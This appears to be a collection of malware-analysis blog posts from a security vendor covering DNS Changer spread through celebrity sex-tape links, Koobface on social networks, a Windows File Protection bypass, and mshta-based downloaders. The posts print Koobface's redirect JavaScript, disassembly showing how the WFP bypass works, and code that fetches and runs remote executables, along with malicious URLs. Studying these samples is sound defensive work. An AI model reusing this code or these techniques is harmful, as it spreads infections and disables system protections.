Eric Dane threesome video links used to serve DNS Changer malware

A recently leaked threesome sex tape, involving Grey’s Anatomy’s “McSteamy” Eric Dane and wife Rebecca Gayheart, has been circulating around the internet. And we all know that controversial stuff like these are often taken advantage of and used to distribute malware using techniques such as social engineering and SEO (search-engine optimization). Users of one particular website have been spotted to be talking about the sex tape. There was no video on the site itself so people wanting to see the video might be enticed to clicking the links posted by fraudulent users and are tricked into downloading and installing malware on their computers.

There’s one such post suggesting we go to hentaiplace.org to watch the leaked video:

Here the malware poses as a fake video codec Divxcoder that users need to install in order to watch the video.
hxxp://hentaiplace.org/play.php?id=Eric_Dane_and_Rebecca_Gayheart_sex_tape

Following the download link hxxp://hentaiplace.org/promo.php, we are redirected to hxxp://fiopolosa.com/download/7933547766773d3dd846130c20090815/FlashCodecPlugin.exe

The malware presents the user with a License Agreement while doing its dubious deeds in the background. And you don’t even need to agree to the License Agreent to install the malware!

The malware changes the affected computer’s DNS settings to use the following IP Addresses as DNS servers:
85.255.112.80
85.255.112.168

This means that the affected computer’s will have to contact these IPs for name resolution and this gives the bad guys a really good opportunity to redirect users to fake websites and steal passwords, login details and other confidential information.

PCTools Spyware Doctor detects the malware as Trojan.DNS_Changer.

This malware employs Rootkit.TDSS and Trojan.TDSServ in order to hide its presence on the infected machine.

Facebook: Rogue AV Farm?

There has been enormous movement related to koobface lately and it has been mostly driven by social networking websites such as Facebook, Tagged, Myspace, Twitter, and many others.

One social networking website that probably tops the list of sites used as attack vectors is Facebook.

Here’s a screenshot of a spoofed Facebook website:

We are presented by a fake codec alert and unsuspecting users usually download and install a malware aptly detected by PC Tools Spyware Doctor as Net-Worm.Koobface.

We have seen koobface being hosted on kukuruku-290709(dot)com, but thanks to the all good guys out there this site has been taken down. But the bad guys have responded and are now using legitimate domains and redirections to serve koobface. We have seen a small patch of code on websites used in the redirection:

wrttnsvqnayay qrqgtlzac
script src ="4fc . js" // edited
qsmypwqmoj bbaspbrq

The strings are random, and so are the names of the javascript files being executed.

Here’s what the javascript file has to offer:

// KROTEG
var abc1 = 'http://kukuruku-290709.com/go/';
var abc2 = 'http://kukuruku-290709.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['twitter.com', abc+'tw.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
];
var s = '' + document.referrer, r = false;
for (var i = 0; i 0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
location.href = redir;
r = true;
break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;

Since the domain kukuruku-290709(dot)com has been brought down already, we’ll soon most likely see new ones emerge to host koobface.

One of the payloads of koobface is downloading other malware, and currently it is serving Rogue AVs including one that PC Tools Spyware Doctor detects as RogueAntiSpyware.System Security.

We’ve talked about RogueAntiSpyware.System Security in a previous post.

A few weeks prior to today, there has been a lot of buzz about Facebook’s Farm Town app serving up Rogue AVs. And recently Facebook is once-again associated with Rogue AVs. Clearly, the bad guys behind these attacks are tyring to make quick bucks by promoting scareware. And of course by using techniques such as Social Engineering , malware and scareware spread rather quickly and easily, because attackers can hide behind the names of even the people we trust.

Take extreme care when viewing emails, tweets, comments or posts. Even if they came from people we know.

Malware foils Windows File Protection

I came across a malware that replaces %system%\comres.dll which in turn runs the malware each time this module library is run.

This file is actually protected by the Windows File Protection feature which is introduced in Windows 2000 here

According to this microsoft article

Windows File Protection (WFP) prevents programs from replacing critical Windows system files. Programs must not overwrite these files because they are used by the operating system and by other programs. Protecting these files prevents problems with programs and the operating system.

In this post, we’ll be looking at how a malware bypasses the Windows File Protection feature in order to replace the critical system file %system%\comres.dll with a copy of the malware.

The malware first disables the Windows File Protection feature (yes, it can be disabled!):


PUSH 0 ; /IsShown = 0
PUSH Avidm_dl.00BBAB7C ; |DefDir = ""
PUSH Avidm_dl.00AC54D8 ; |Parameters = "/REVERT"
PUSH EAX ; |C:\WINDOWS\system32\sfc.exe
PUSH Avidm_dl.00AC54D0 ; |Operation = "open"
PUSH 0 ; |hWnd = NULL
CALL DWORD PTR DS:[; \ShellExecuteA
...
PUSH ECX ; /pHandle
PUSH 0F003F ; |Access = KEY_ALL_ACCESS
PUSH 0 ; |Reserved = 0
PUSH Avidm_dl.00AC5498 ; |Subkey = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
PUSH 80000002 ; |hKey = HKEY_LOCAL_MACHINE
CALL DWORD PTR DS:[; \RegOpenKeyExA
MOV EAX,DWORD PTR SS:[ESP+10]
LEA EDX,DWORD PTR SS:[ESP+14]
PUSH 4 ; /BufSize = 4
PUSH EDX ; |0xffffff9d
PUSH 4 ; |ValueType = REG_DWORD
PUSH 0 ; |Reserved = 0
PUSH Avidm_dl.00AC548C ; |ValueName = "SfcDisable"
PUSH EAX ; |hKey
MOV DWORD PTR SS:[ESP+2C],-63 ; |
CALL DWORD PTR DS:[; \RegSetValueExA
MOV ECX,DWORD PTR SS:[ESP+10]
PUSH ECX ; /hKey
CALL DWORD PTR DS:[; \RegCloseKey


The malware then saves a copy of %system%\sfc_os.dll as %system%\sfc_my.dll:


PUSH 1 ; /FailIfExists = TRUE
REPNE SCAS BYTE PTR ES:[EDI] ; |
MOV ECX,EBP ; |
DEC EDI ; |
SHR ECX,2 ; |
REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; |
MOV ECX,EBP ; |
LEA EAX,DWORD PTR SS:[ESP+120] ; |
AND ECX,3 ; |
PUSH EAX ; |new filename: C:\WINDOWS\system32\sfc_my.dll
REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ; |
LEA ECX,DWORD PTR SS:[ESP+228] ; |
PUSH ECX ; |existing filename: C:\WINDOWS\system32\sfc_os.dll
CALL DWORD PTR DS:[] ; \CopyFileA


It then loads the newly-copied file to get the address of an exported API via Ordinal #5, an undocumented API SetSfcFileException to disable Windows File Protection for %system%\comres.dll, Windows COM services:


PUSH EDX ; /C:\WINDOWS\system32\sfc_my.dll
CALL DWORD PTR DS:[] ; \LoadLibraryA
PUSH 5 ; /ProcNameOrOrdinal = #5
PUSH EAX ; |hModule
CALL DWORD PTR DS:[] ; \GetProcAddress
...
PUSH EDX ; c:\windows\system32\comres.dll
PUSH 0
CALL EBP ; sfc_my.#5


The malware then saves the original comres.dll as comresdk.dll, removes comres.dll in %dllcache%, and it is now ready to use the name comres.dll in %system%:


PUSH EDX ; /newname: comresdk.dll
PUSH EAX ; |oldname: comres.dll
CALL ; \rename
...
PUSH EDX ; /path=C:\WINDOWS\system32\dllcache\comres.dll
CALL ; \remove
...
PUSH 1 ; /FailIfExists = TRUE
PUSH EAX ; |NewFilename: C:\WINDOWS\system32\comres.dll
PUSH ECX ; |ExistingFilename:
CALL DWORD PTR DS:[>; \CopyFileA


There we have it folks, the malware foiled the Windows System File Protection feature using perfectly legitimate and readily available methods.

Digital clutter

In relation to a previous post, visting the malicious domain

hxxp://zusojbktvo.cn/fin.php

leads us into downloading

hxxp://woqyymmptn.cn/setup/setup.exe

This malware in turn runs the Microsoft HTML Application host (mshta.exe) to execute hxxp://enjnzdfmts.cn/33t.php

00400256 >/$ 6A 00 PUSH 0 ; /IsShown = 0
00400258 |. 6A 00 PUSH 0 ; |DefDir = NULL
0040025A |. 68 39024000 PUSH setup.00400239 ; |Parameters = "http://enjnzdfmts.cn/33t.php"
0040025F |. 68 2F024000 PUSH setup.0040022F ; |FileName = "mshta.exe"
00400264 |. 6A 00 PUSH 0 ; |Operation = NULL
00400266 |. 6A 00 PUSH 0 ; |hWnd = NULL
00400268 |. E8 81010000 CALL ; \ShellExecuteA

The url hxxp://enjnzdfmts.cn/33t.php gives us a page with an obfuscated javascript:

Which translates to:

The script basically creates and executes files in an attempt to download and install more malware on the affected machine. In the process, it creates a ftp connection to woqyymmptn.cn with the following cretentials:


username: qqq
password: 123456


It also creates a batch file that creates numerous Scheduled Tasks that run mshta.exe to execute hxxp://woqyymmptn.cn/33t.php which basically does the same thing as the above script.

hxxp://12-2005-search.com/cool.exe is then downloaded and executed as %Temp%\675.exe. The download link, however, is no longer active.


004002CD . 68 90000000 PUSH 90
004002D2 . 891C24 MOV DWORD PTR SS:[ESP],EBX
004002D5 . 68 90000000 PUSH 90
004002DA . C70424 0401000>MOV DWORD PTR SS:[ESP],104
004002E1 . 68 D0034000 PUSH
004002E6 . 58 POP EAX
004002E7 . E8 00000000 CALL setup.004002EC
004002EC $ 830424 06 ADD DWORD PTR SS:[ESP],6
004002F0 . FFE0 JMP EAX ;
004002F2 E8 DB E8
004002F3 01 DB 01
004002F4 00 DB 00
004002F5 00 DB 00
004002F6 . 0008 ADD BYTE PTR DS:[EAX],CL
004002F8 . 5D POP EBP
004002F9 . 33C9 XOR ECX,ECX
004002FB . 8A4D 00 MOV CL,BYTE PTR SS:[EBP]
004002FE . 8BFB MOV EDI,EBX
00400300 . 03F8 ADD EDI,EAX
00400302 . BE 08024000 MOV ESI,setup.00400208 ; ASCII "675.exe"
00400307 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
00400309 . 51 PUSH ECX
0040030A . 51 PUSH ECX
0040030B . 53 PUSH EBX
0040030C . E8 23000000 CALL setup.00400334
00400311 . 68 74 74 70 3A>ASCII "http://"
00400318 . 31 32 2D 32 30>ASCII "12-2005-search.c"
00400328 . 6F 6D 2F 63 6F>ASCII "om/cool.exe",0
00400334 $ 51 PUSH ECX
00400335 . 68 E2034000 PUSH
0040033A . 58 POP EAX
0040033B . E8 00000000 CALL setup.00400340
00400340 $ 830424 06 ADD DWORD PTR SS:[ESP],6
00400344 . FFE0 JMP EAX
00400346 . 51 PUSH ECX
00400347 . 53 PUSH EBX
00400348 . 68 DC034000 PUSH
0040034D . 58 POP EAX
0040034E . E8 00000000 CALL setup.00400353
00400353 $ 830424 06 ADD DWORD PTR SS:[ESP],6
00400357 . FFE0 JMP EAX


The malware uses random filenames as we can see from the filenames used in the embedded script above. These are possibly ramdonly-generated by the PHP code behind it.

In effect, the malware creates heaps of batch files, text files, blank .exe files (unavailable download), and .job files on the affected system. Talk about heavy digital clutter!

Malicious domain uses old IE Vulnerability to download and install malware

Visting the malicious url:

hxxp://zusojbktvo.cn/md/t.html

gives us a blank page at plain sight.

However, upon careful inspection we are presented with the following:

Which translates to the following shellcode:

Analyzing the shellcode basically leads us to the malware downloading

hxxp://pxciiruurw.cn/new/load.exe

which is saved and executed as:

c:\ 0xf9.exe

Microsoft already released a patch to resolve this vulnerability MS08-078